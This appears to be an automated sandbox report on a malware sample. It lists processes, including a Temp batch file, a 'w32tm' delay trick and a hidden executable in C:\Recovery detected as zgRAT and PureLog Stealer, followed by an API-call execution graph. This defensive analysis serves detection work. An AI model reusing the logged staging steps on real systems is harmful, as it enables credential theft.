                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:44
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:45
                                                                                Start time:17:32:30
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\M1cWFCMEcy.bat"
                                                                                Imagebase:0x7ff72c350000
                                                                                File size:289'792 bytes
                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:46
                                                                                Start time:17:32:30
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:47
                                                                                Start time:17:32:32
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\chcp.com
                                                                                Wow64 process (32bit):false
                                                                                Commandline:chcp 65001
                                                                                Imagebase:0x7ff7dd810000
                                                                                File size:14'848 bytes
                                                                                MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:48
                                                                                Start time:17:32:38
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\w32tm.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                Imagebase:0x7ff7db370000
                                                                                File size:108'032 bytes
                                                                                MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:49
                                                                                Start time:17:32:43
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                Imagebase:0x7ff693ab0000
                                                                                File size:496'640 bytes
                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:50
                                                                                Start time:17:32:46
                                                                                Start date:11/01/2025
                                                                                Path:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe"
                                                                                Imagebase:0xb0000
                                                                                File size:2'072'064 bytes
                                                                                MD5 hash:7A6B9E23ECCB90B36EB6A4FE87427D41
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe, Author: Joe Security
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Avira
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                • Detection: 83%, ReversingLabs
                                                                                Has exited:false

                                                                                Target ID:51
                                                                                Start time:17:32:50
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                Imagebase:0x7ff6eef20000
                                                                                File size:55'320 bytes
                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false


                                                                                  Execution Graph

                                                                                  Execution Coverage:9.8%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:10.1%
                                                                                  Total number of Nodes:1510
                                                                                  Total number of Limit Nodes:28
23395 28e82f 23393->23395 23396 28e664 DloadReleaseSectionWriteAccess 3 API calls 23394->23396 23395->23378 23397 28e812 23396->23397 23398 28e82a 23397->23398 23399 28e78d DloadProtectSection 3 API calls 23397->23399 23412 28e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23398->23412 23399->23398 23410 28e5ee GetModuleHandleW GetProcAddress GetProcAddress 23401->23410 23403 28e669 23403->23388 23406 28e7a2 DloadProtectSection 23404->23406 23405 28e7a8 23405->23389 23406->23405 23407 28e7dd VirtualProtect 23406->23407 23411 28e6a3 VirtualQuery GetSystemInfo 23406->23411 23407->23405 23409->23392 23410->23403 23411->23407 23412->23395 23621 28f3b2 23622 28f3be __FrameHandler3::FrameUnwindToState 23621->23622 23653 28eed7 23622->23653 23624 28f3c5 23625 28f518 23624->23625 23628 28f3ef 23624->23628 23726 28f838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 23625->23726 23627 28f51f 23719 297f58 23627->23719 23641 28f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23628->23641 23664 298aed 23628->23664 23635 28f40e 23637 28f48f 23672 28f953 GetStartupInfoW _abort 23637->23672 23639 28f495 23673 298a3e 51 API calls 23639->23673 23641->23637 23722 297af4 38 API calls 2 library calls 23641->23722 23642 28f49d 23674 28df1e 23642->23674 23647 28f4b1 23647->23627 23648 28f4b5 23647->23648 23649 28f4be 23648->23649 23724 297efb 28 API calls _abort 23648->23724 23725 28f048 12 API calls ___scrt_uninitialize_crt 23649->23725 23652 28f4c6 23652->23635 23654 28eee0 23653->23654 23728 28f654 IsProcessorFeaturePresent 23654->23728 23656 28eeec 23729 292a5e 23656->23729 23658 28eef1 23659 28eef5 23658->23659 23737 298977 23658->23737 23659->23624 23662 28ef0c 23662->23624 23665 298b04 23664->23665 23666 28fbbc CatchGuardHandler 5 API calls 23665->23666 23667 28f408 23666->23667 23667->23635 23668 298a91 23667->23668 23669 298ac0 23668->23669 23670 28fbbc 
CatchGuardHandler 5 API calls 23669->23670 23671 298ae9 23670->23671 23671->23641 23672->23639 23673->23642 23837 280863 23674->23837 23678 28df3d 23886 28ac16 23678->23886 23680 28df46 _abort 23681 28df59 GetCommandLineW 23680->23681 23682 28df68 23681->23682 23683 28dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23681->23683 23890 28c5c4 23682->23890 23901 274092 23683->23901 23689 28dfe0 23895 28dbde 23689->23895 23690 28df76 OpenFileMappingW 23692 28df8f MapViewOfFile 23690->23692 23693 28dfd6 CloseHandle 23690->23693 23696 28dfcd UnmapViewOfFile 23692->23696 23697 28dfa0 __InternalCxxFrameHandler 23692->23697 23693->23683 23696->23693 23701 28dbde 2 API calls 23697->23701 23703 28dfbc 23701->23703 23702 2890b7 8 API calls 23704 28e0aa DialogBoxParamW 23702->23704 23703->23696 23705 28e0e4 23704->23705 23706 28e0fd 23705->23706 23707 28e0f6 Sleep 23705->23707 23710 28e10b 23706->23710 23934 28ae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 23706->23934 23707->23706 23709 28e12a DeleteObject 23711 28e13f DeleteObject 23709->23711 23712 28e146 23709->23712 23710->23709 23711->23712 23713 28e177 23712->23713 23717 28e189 23712->23717 23935 28dc3b 6 API calls 23713->23935 23715 28e17d CloseHandle 23715->23717 23931 28ac7c 23717->23931 23718 28e1c3 23723 28f993 GetModuleHandleW 23718->23723 24184 297cd5 23719->24184 23722->23637 23723->23647 23724->23649 23725->23652 23726->23627 23728->23656 23741 293b07 23729->23741 23733 292a6f 23734 292a7a 23733->23734 23755 293b43 DeleteCriticalSection 23733->23755 23734->23658 23736 292a67 23736->23658 23784 29c05a 23737->23784 23740 292a7d 7 API calls 2 library calls 23740->23659 23742 293b10 23741->23742 23744 293b39 23742->23744 23745 292a63 23742->23745 23756 293d46 23742->23756 23761 293b43 DeleteCriticalSection 23744->23761 23745->23736 23747 292b8c 23745->23747 23777 293c57 23747->23777 23750 292ba1 23750->23733 23752 292baf 23753 292bbc 23752->23753 23783 292bbf 6 API calls ___vcrt_FlsFree 
23752->23783 23753->23733 23755->23736 23762 293c0d 23756->23762 23759 293d7e InitializeCriticalSectionAndSpinCount 23760 293d69 23759->23760 23760->23742 23761->23745 23763 293c26 23762->23763 23764 293c4f 23762->23764 23763->23764 23769 293b72 23763->23769 23764->23759 23764->23760 23767 293c3b GetProcAddress 23767->23764 23768 293c49 23767->23768 23768->23764 23775 293b7e ___vcrt_FlsSetValue 23769->23775 23770 293bf3 23770->23764 23770->23767 23771 293b95 LoadLibraryExW 23772 293bfa 23771->23772 23773 293bb3 GetLastError 23771->23773 23772->23770 23774 293c02 FreeLibrary 23772->23774 23773->23775 23774->23770 23775->23770 23775->23771 23776 293bd5 LoadLibraryExW 23775->23776 23776->23772 23776->23775 23778 293c0d ___vcrt_FlsSetValue 5 API calls 23777->23778 23779 293c71 23778->23779 23780 293c8a TlsAlloc 23779->23780 23781 292b96 23779->23781 23781->23750 23782 293d08 6 API calls ___vcrt_FlsSetValue 23781->23782 23782->23752 23783->23750 23787 29c077 23784->23787 23788 29c073 23784->23788 23785 28fbbc CatchGuardHandler 5 API calls 23786 28eefe 23785->23786 23786->23662 23786->23740 23787->23788 23790 29a6a0 23787->23790 23788->23785 23791 29a6ac __FrameHandler3::FrameUnwindToState 23790->23791 23802 29ac31 EnterCriticalSection 23791->23802 23793 29a6b3 23803 29c528 23793->23803 23795 29a6c2 23796 29a6d1 23795->23796 23816 29a529 29 API calls 23795->23816 23818 29a6ed LeaveCriticalSection _abort 23796->23818 23799 29a6e2 _abort 23799->23787 23800 29a6cc 23817 29a5df GetStdHandle GetFileType 23800->23817 23802->23793 23804 29c534 __FrameHandler3::FrameUnwindToState 23803->23804 23805 29c558 23804->23805 23806 29c541 23804->23806 23819 29ac31 EnterCriticalSection 23805->23819 23827 2991a8 20 API calls __dosmaperr 23806->23827 23809 29c546 23828 299087 26 API calls __cftof 23809->23828 23811 29c550 _abort 23811->23795 23812 29c590 23829 29c5b7 LeaveCriticalSection _abort 23812->23829 23814 29c564 23814->23812 23820 29c479 23814->23820 23816->23800 23817->23796 
23818->23799 23819->23814 23821 29b136 _unexpected 20 API calls 23820->23821 23822 29c48b 23821->23822 23826 29c498 23822->23826 23830 29af0a 23822->23830 23823 298dcc _free 20 API calls 23824 29c4ea 23823->23824 23824->23814 23826->23823 23827->23809 23828->23811 23829->23811 23831 29ac98 _unexpected 5 API calls 23830->23831 23832 29af31 23831->23832 23833 29af3a 23832->23833 23834 29af4f InitializeCriticalSectionAndSpinCount 23832->23834 23835 28fbbc CatchGuardHandler 5 API calls 23833->23835 23834->23833 23836 29af66 23835->23836 23836->23822 23936 28ec50 23837->23936 23840 280888 GetProcAddress 23842 2808b9 GetProcAddress 23840->23842 23843 2808a1 23840->23843 23841 2808e7 23844 280c14 GetModuleFileNameW 23841->23844 23947 2975fb 42 API calls __vsnwprintf_l 23841->23947 23845 2808cb 23842->23845 23843->23842 23853 280c32 23844->23853 23845->23841 23847 280b54 23847->23844 23848 280b5f GetModuleFileNameW CreateFileW 23847->23848 23849 280c08 CloseHandle 23848->23849 23850 280b8f SetFilePointer 23848->23850 23849->23844 23850->23849 23851 280b9d ReadFile 23850->23851 23851->23849 23855 280bbb 23851->23855 23856 280c94 GetFileAttributesW 23853->23856 23858 280c5d CompareStringW 23853->23858 23859 280cac 23853->23859 23938 27b146 23853->23938 23941 28081b 23853->23941 23855->23849 23857 28081b 2 API calls 23855->23857 23856->23853 23856->23859 23857->23855 23858->23853 23861 280cec 23859->23861 23862 280cb7 23859->23862 23860 280dfb 23885 28a64d GetCurrentDirectoryW 23860->23885 23861->23860 23865 27b146 GetVersionExW 23861->23865 23863 280cd0 GetFileAttributesW 23862->23863 23864 280ce8 23862->23864 23863->23862 23863->23864 23864->23861 23866 280d06 23865->23866 23867 280d0d 23866->23867 23868 280d73 23866->23868 23870 28081b 2 API calls 23867->23870 23869 274092 _swprintf 51 API calls 23868->23869 23871 280d9b AllocConsole 23869->23871 23872 280d17 23870->23872 23873 280da8 GetCurrentProcessId AttachConsole 23871->23873 23874 280df3 ExitProcess 23871->23874 
23875 28081b 2 API calls 23872->23875 23952 293e13 23873->23952 23877 280d21 23875->23877 23948 27e617 23877->23948 23878 280dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 23878->23874 23881 274092 _swprintf 51 API calls 23882 280d4f 23881->23882 23883 27e617 53 API calls 23882->23883 23884 280d5e 23883->23884 23884->23874 23885->23678 23887 28081b 2 API calls 23886->23887 23888 28ac2a OleInitialize 23887->23888 23889 28ac4d GdiplusStartup SHGetMalloc 23888->23889 23889->23680 23893 28c5ce 23890->23893 23891 28c6e4 23891->23689 23891->23690 23892 281fac CharUpperW 23892->23893 23893->23891 23893->23892 23977 27f3fa 82 API calls 2 library calls 23893->23977 23896 28ec50 23895->23896 23897 28dbeb SetEnvironmentVariableW 23896->23897 23899 28dc0e 23897->23899 23898 28dc36 23898->23683 23899->23898 23900 28dc2a SetEnvironmentVariableW 23899->23900 23900->23898 23978 274065 23901->23978 23904 28b6dd LoadBitmapW 23905 28b70b GetObjectW 23904->23905 23906 28b6fe 23904->23906 23907 28b71a 23905->23907 24012 28a6c2 FindResourceW 23906->24012 24007 28a5c6 23907->24007 23912 28b770 23923 27da42 23912->23923 23913 28b74c 24026 28a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23913->24026 23914 28a6c2 12 API calls 23916 28b73d 23914->23916 23916->23913 23918 28b743 DeleteObject 23916->23918 23917 28b754 24027 28a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23917->24027 23918->23913 23920 28b75d 24028 28a80c 8 API calls 23920->24028 23922 28b764 DeleteObject 23922->23912 24039 27da67 23923->24039 23928 2890b7 24172 28eb38 23928->24172 23932 28acab GdiplusShutdown CoUninitialize 23931->23932 23932->23718 23934->23710 23935->23715 23937 28086d GetModuleHandleW 23936->23937 23937->23840 23937->23841 23939 27b15a GetVersionExW 23938->23939 23940 27b196 23938->23940 23939->23940 23940->23853 23942 28ec50 23941->23942 23943 280828 GetSystemDirectoryW 23942->23943 23944 28085e 23943->23944 23945 280840 23943->23945 23944->23853 23946 280851 LoadLibraryW 23945->23946 23946->23944 
23947->23847 23949 27e627 23948->23949 23954 27e648 23949->23954 23953 293e1b 23952->23953 23953->23878 23953->23953 23960 27d9b0 23954->23960 23957 27e645 23957->23881 23958 27e66b LoadStringW 23958->23957 23959 27e682 LoadStringW 23958->23959 23959->23957 23965 27d8ec 23960->23965 23962 27d9cd 23963 27d9e2 23962->23963 23973 27d9f0 26 API calls 23962->23973 23963->23957 23963->23958 23966 27d904 23965->23966 23972 27d984 _strncpy 23965->23972 23968 27d928 23966->23968 23974 281da7 WideCharToMultiByte 23966->23974 23969 27d959 23968->23969 23975 27e5b1 50 API calls __vsnprintf 23968->23975 23976 296159 26 API calls 3 library calls 23969->23976 23972->23962 23973->23963 23974->23968 23975->23969 23976->23972 23977->23893 23979 27407c __vsnwprintf_l 23978->23979 23982 295fd4 23979->23982 23985 294097 23982->23985 23986 2940bf 23985->23986 23987 2940d7 23985->23987 24002 2991a8 20 API calls __dosmaperr 23986->24002 23987->23986 23988 2940df 23987->23988 23990 294636 __cftof 38 API calls 23988->23990 23993 2940ef 23990->23993 23991 2940c4 24003 299087 26 API calls __cftof 23991->24003 24004 294601 20 API calls 2 library calls 23993->24004 23994 28fbbc CatchGuardHandler 5 API calls 23996 274086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 23994->23996 23996->23904 23997 294167 24005 2949e6 51 API calls 3 library calls 23997->24005 24000 2940cf 24000->23994 24001 294172 24006 2946b9 20 API calls _free 24001->24006 24002->23991 24003->24000 24004->23997 24005->24001 24006->24000 24029 28a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24007->24029 24009 28a5cd 24010 28a5d9 24009->24010 24030 28a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24009->24030 24010->23912 24010->23913 24010->23914 24013 28a6e5 SizeofResource 24012->24013 24018 28a7d3 24012->24018 24014 28a6fc LoadResource 24013->24014 24013->24018 24015 28a711 LockResource 24014->24015 24014->24018 24016 28a722 GlobalAlloc 24015->24016 24015->24018 24017 28a73d GlobalLock 24016->24017 24016->24018 24019 
28a7cc GlobalFree 24017->24019 24020 28a74c __InternalCxxFrameHandler 24017->24020 24018->23905 24018->23907 24019->24018 24021 28a7c5 GlobalUnlock 24020->24021 24031 28a626 GdipAlloc 24020->24031 24021->24019 24024 28a79a GdipCreateHBITMAPFromBitmap 24025 28a7b0 24024->24025 24025->24021 24026->23917 24027->23920 24028->23922 24029->24009 24030->24010 24032 28a638 24031->24032 24033 28a645 24031->24033 24035 28a3b9 24032->24035 24033->24021 24033->24024 24033->24025 24036 28a3da GdipCreateBitmapFromStreamICM 24035->24036 24037 28a3e1 GdipCreateBitmapFromStream 24035->24037 24038 28a3e6 24036->24038 24037->24038 24038->24033 24040 27da75 _wcschr __EH_prolog 24039->24040 24041 27daa4 GetModuleFileNameW 24040->24041 24042 27dad5 24040->24042 24043 27dabe 24041->24043 24085 2798e0 24042->24085 24043->24042 24045 27db31 24096 296310 24045->24096 24047 27e261 78 API calls 24050 27db05 24047->24050 24050->24045 24050->24047 24063 27dd4a 24050->24063 24051 27db44 24052 296310 26 API calls 24051->24052 24060 27db56 ___vcrt_FlsSetValue 24052->24060 24053 27dc85 24053->24063 24132 279d70 81 API calls 24053->24132 24057 27dc9f ___std_exception_copy 24058 279bd0 82 API calls 24057->24058 24057->24063 24061 27dcc8 ___std_exception_copy 24058->24061 24060->24053 24060->24063 24110 279e80 24060->24110 24126 279bd0 24060->24126 24131 279d70 81 API calls 24060->24131 24061->24063 24079 27dcd3 ___vcrt_FlsSetValue _wcslen ___std_exception_copy 24061->24079 24133 281b84 MultiByteToWideChar 24061->24133 24119 27959a 24063->24119 24064 27e159 24070 27e1de 24064->24070 24139 298cce 26 API calls 2 library calls 24064->24139 24066 27e16e 24140 297625 26 API calls 2 library calls 24066->24140 24068 27e1c6 24141 27e27c 78 API calls 24068->24141 24069 27e214 24074 296310 26 API calls 24069->24074 24070->24069 24073 27e261 78 API calls 24070->24073 24073->24070 24075 27e22d 24074->24075 24076 296310 26 API calls 24075->24076 24076->24063 24079->24063 24079->24064 24080 281da7 
WideCharToMultiByte 24079->24080 24134 27e5b1 50 API calls __vsnprintf 24079->24134 24135 296159 26 API calls 3 library calls 24079->24135 24136 298cce 26 API calls 2 library calls 24079->24136 24137 297625 26 API calls 2 library calls 24079->24137 24138 27e27c 78 API calls 24079->24138 24080->24079 24083 27e29e GetModuleHandleW FindResourceW 24084 27da55 24083->24084 24084->23928 24086 2798ea 24085->24086 24087 27994b CreateFileW 24086->24087 24088 27996c GetLastError 24087->24088 24092 2799bb 24087->24092 24142 27bb03 24088->24142 24090 27998c 24091 279990 CreateFileW GetLastError 24090->24091 24090->24092 24091->24092 24094 2799b5 24091->24094 24093 2799ff 24092->24093 24095 2799e5 SetFileTime 24092->24095 24093->24050 24094->24092 24095->24093 24097 296349 24096->24097 24098 29634d 24097->24098 24109 296375 24097->24109 24146 2991a8 20 API calls __dosmaperr 24098->24146 24100 296352 24147 299087 26 API calls __cftof 24100->24147 24102 28fbbc CatchGuardHandler 5 API calls 24104 2966a6 24102->24104 24103 29635d 24105 28fbbc CatchGuardHandler 5 API calls 24103->24105 24104->24051 24106 296369 24105->24106 24106->24051 24108 296699 24108->24102 24109->24108 24148 296230 5 API calls CatchGuardHandler 24109->24148 24111 279e92 24110->24111 24116 279ea5 24110->24116 24112 279eb0 24111->24112 24149 276d5b 77 API calls 24111->24149 24112->24060 24113 279eb8 SetFilePointer 24113->24112 24115 279ed4 GetLastError 24113->24115 24115->24112 24117 279ede 24115->24117 24116->24112 24116->24113 24117->24112 24150 276d5b 77 API calls 24117->24150 24120 2795be 24119->24120 24125 2795cf 24119->24125 24121 2795d1 24120->24121 24122 2795ca 24120->24122 24120->24125 24156 279620 24121->24156 24151 27974e 24122->24151 24125->24083 24127 279bdc 24126->24127 24128 279be3 24126->24128 24127->24060 24128->24127 24130 279785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 24128->24130 24171 276d1a 77 API calls 24128->24171 24130->24128 24131->24060 24132->24057 24133->24079 
24134->24079 24135->24079 24136->24079 24137->24079 24138->24079 24139->24066 24140->24068 24141->24070 24143 27bb10 _wcslen 24142->24143 24144 27bbb8 GetCurrentDirectoryW 24143->24144 24145 27bb39 _wcslen 24143->24145 24144->24145 24145->24090 24146->24100 24147->24103 24148->24109 24149->24116 24150->24112 24152 279781 24151->24152 24155 279757 24151->24155 24152->24125 24155->24152 24162 27a1e0 24155->24162 24157 27964a 24156->24157 24158 27962c 24156->24158 24159 279669 24157->24159 24170 276bd5 76 API calls 24157->24170 24158->24157 24160 279638 CloseHandle 24158->24160 24159->24125 24160->24157 24163 28ec50 24162->24163 24164 27a1ed DeleteFileW 24163->24164 24165 27a200 24164->24165 24166 27977f 24164->24166 24167 27bb03 GetCurrentDirectoryW 24165->24167 24166->24125 24168 27a214 24167->24168 24168->24166 24169 27a218 DeleteFileW 24168->24169 24169->24166 24170->24159 24171->24128 24173 28eb3d ___std_exception_copy 24172->24173 24174 2890d6 24173->24174 24177 28eb59 24173->24177 24181 297a5e 7 API calls 2 library calls 24173->24181 24174->23702 24176 28f5c9 24183 29238d RaiseException 24176->24183 24177->24176 24182 29238d RaiseException 24177->24182 24179 28f5e6 24181->24173 24182->24176 24183->24179 24185 297ce1 _unexpected 24184->24185 24186 297ce8 24185->24186 24187 297cfa 24185->24187 24220 297e2f GetModuleHandleW 24186->24220 24208 29ac31 EnterCriticalSection 24187->24208 24190 297ced 24190->24187 24221 297e73 GetModuleHandleExW 24190->24221 24195 297d01 24205 297d9f 24195->24205 24207 297d76 24195->24207 24229 2987e0 20 API calls _abort 24195->24229 24196 297de8 24230 2a2390 5 API calls CatchGuardHandler 24196->24230 24197 297dbc 24212 297dee 24197->24212 24198 297d8e 24200 298a91 _abort 5 API calls 24198->24200 24199 298a91 _abort 5 API calls 24199->24198 24200->24205 24209 297ddf 24205->24209 24207->24198 24207->24199 24208->24195 24231 29ac81 LeaveCriticalSection 24209->24231 24211 297db8 24211->24196 24211->24197 24232 29b076 24212->24232 24215 
297e1c 24218 297e73 _abort 8 API calls 24215->24218 24216 297dfc GetPEB 24216->24215 24217 297e0c GetCurrentProcess TerminateProcess 24216->24217 24217->24215 24219 297e24 ExitProcess 24218->24219 24220->24190 24222 297e9d GetProcAddress 24221->24222 24223 297ec0 24221->24223 24224 297eb2 24222->24224 24225 297ecf 24223->24225 24226 297ec6 FreeLibrary 24223->24226 24224->24223 24227 28fbbc CatchGuardHandler 5 API calls 24225->24227 24226->24225 24228 297cf9 24227->24228 24228->24187 24229->24207 24231->24211 24233 29b09b 24232->24233 24234 29b091 24232->24234 24235 29ac98 _unexpected 5 API calls 24233->24235 24236 28fbbc CatchGuardHandler 5 API calls 24234->24236 24235->24234 24237 297df8 24236->24237 24237->24215 24237->24216 25312 28c793 97 API calls 4 library calls 25340 28b18d 78 API calls 25341 289580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 25356 28c793 102 API calls 5 library calls 25315 29b49d 6 API calls CatchGuardHandler 24257 2713e1 84 API calls 2 library calls 24259 28b7e0 24260 28b7ea __EH_prolog 24259->24260 24425 271316 24260->24425 24263 28b841 24264 28b82a 24264->24263 24267 28b838 24264->24267 24268 28b89b 24264->24268 24265 28bf0f 24490 28d69e 24265->24490 24273 28b878 24267->24273 24274 28b83c 24267->24274 24272 28b92e GetDlgItemTextW 24268->24272 24278 28b8b1 24268->24278 24270 28bf38 24275 28bf41 SendDlgItemMessageW 24270->24275 24276 28bf52 GetDlgItem SendMessageW 24270->24276 24271 28bf2a SendMessageW 24271->24270 24272->24273 24277 28b96b 24272->24277 24273->24263 24280 28b95f KiUserCallbackDispatcher 24273->24280 24274->24263 24283 27e617 53 API calls 24274->24283 24275->24276 24508 28a64d GetCurrentDirectoryW 24276->24508 24281 28b980 GetDlgItem 24277->24281 24423 28b974 24277->24423 24282 27e617 53 API calls 24278->24282 24280->24263 24286 28b994 SendMessageW SendMessageW 24281->24286 24287 28b9b7 SetFocus 24281->24287 24288 28b8ce SetDlgItemTextW 24282->24288 24284 28b85b 24283->24284 24530 27124f 
SHGetMalloc 24284->24530 24285 28bf82 GetDlgItem 24290 28bf9f 24285->24290 24291 28bfa5 SetWindowTextW 24285->24291 24286->24287 24292 28b9c7 24287->24292 24303 28b9e0 24287->24303 24293 28b8d9 24288->24293 24290->24291 24509 28abab GetClassNameW 24291->24509 24297 27e617 53 API calls 24292->24297 24293->24263 24300 28b8e6 GetMessageW 24293->24300 24294 28b862 24294->24263 24302 28c1fc SetDlgItemTextW 24294->24302 24295 28be55 24298 27e617 53 API calls 24295->24298 24301 28b9d1 24297->24301 24304 28be65 SetDlgItemTextW 24298->24304 24300->24263 24306 28b8fd IsDialogMessageW 24300->24306 24531 28d4d4 24301->24531 24302->24263 24311 27e617 53 API calls 24303->24311 24308 28be79 24304->24308 24306->24293 24310 28b90c TranslateMessage DispatchMessageW 24306->24310 24313 27e617 53 API calls 24308->24313 24310->24293 24312 28ba17 24311->24312 24316 274092 _swprintf 51 API calls 24312->24316 24339 28be9c _wcslen 24313->24339 24314 28bff0 24315 28c020 24314->24315 24321 27e617 53 API calls 24314->24321 24322 28c0d8 24315->24322 24327 28c73f 97 API calls 24315->24327 24323 28ba29 24316->24323 24317 28b9d9 24435 27a0b1 24317->24435 24319 28c73f 97 API calls 24319->24314 24326 28c003 SetDlgItemTextW 24321->24326 24329 28c18b 24322->24329 24362 28c169 24322->24362 24372 27e617 53 API calls 24322->24372 24328 28d4d4 16 API calls 24323->24328 24324 28ba68 GetLastError 24325 28ba73 24324->24325 24441 28ac04 SetCurrentDirectoryW 24325->24441 24330 27e617 53 API calls 24326->24330 24332 28c03b 24327->24332 24328->24317 24333 28c19d 24329->24333 24334 28c194 EnableWindow 24329->24334 24335 28c017 SetDlgItemTextW 24330->24335 24345 28c04d 24332->24345 24369 28c072 24332->24369 24341 28c1ba 24333->24341 24549 2712d3 GetDlgItem EnableWindow 24333->24549 24334->24333 24335->24315 24336 28ba87 24343 28ba90 GetLastError 24336->24343 24344 28ba9e 24336->24344 24337 27e617 53 API calls 24337->24263 24338 28c0cb 24347 28c73f 97 API calls 24338->24347 24350 27e617 53 API calls 24339->24350 
24373 28beed 24339->24373 24342 28c1e1 24341->24342 24355 28c1d9 SendMessageW 24341->24355 24342->24263 24357 27e617 53 API calls 24342->24357 24343->24344 24348 28bb11 24344->24348 24351 28bb20 24344->24351 24356 28baae GetTickCount 24344->24356 24547 289ed5 32 API calls 24345->24547 24346 28c1b0 24550 2712d3 GetDlgItem EnableWindow 24346->24550 24347->24322 24348->24351 24352 28bd56 24348->24352 24358 28bed0 24350->24358 24359 28bcfb 24351->24359 24360 28bb39 GetModuleFileNameW 24351->24360 24361 28bcf1 24351->24361 24450 2712f1 GetDlgItem ShowWindow 24352->24450 24353 28c066 24353->24369 24355->24342 24364 274092 _swprintf 51 API calls 24356->24364 24357->24294 24365 274092 _swprintf 51 API calls 24358->24365 24368 27e617 53 API calls 24359->24368 24541 27f28c 82 API calls 24360->24541 24361->24273 24361->24359 24548 289ed5 32 API calls 24362->24548 24371 28bac7 24364->24371 24365->24373 24376 28bd05 24368->24376 24369->24338 24377 28c73f 97 API calls 24369->24377 24370 28bd66 24451 2712f1 GetDlgItem ShowWindow 24370->24451 24442 27966e 24371->24442 24372->24322 24373->24337 24374 28bb5f 24379 274092 _swprintf 51 API calls 24374->24379 24375 28c188 24375->24329 24380 274092 _swprintf 51 API calls 24376->24380 24381 28c0a0 24377->24381 24384 28bb81 CreateFileMappingW 24379->24384 24385 28bd23 24380->24385 24381->24338 24386 28c0a9 DialogBoxParamW 24381->24386 24382 28bd70 24387 27e617 53 API calls 24382->24387 24390 28bbe3 GetCommandLineW 24384->24390 24418 28bc60 __InternalCxxFrameHandler 24384->24418 24398 27e617 53 API calls 24385->24398 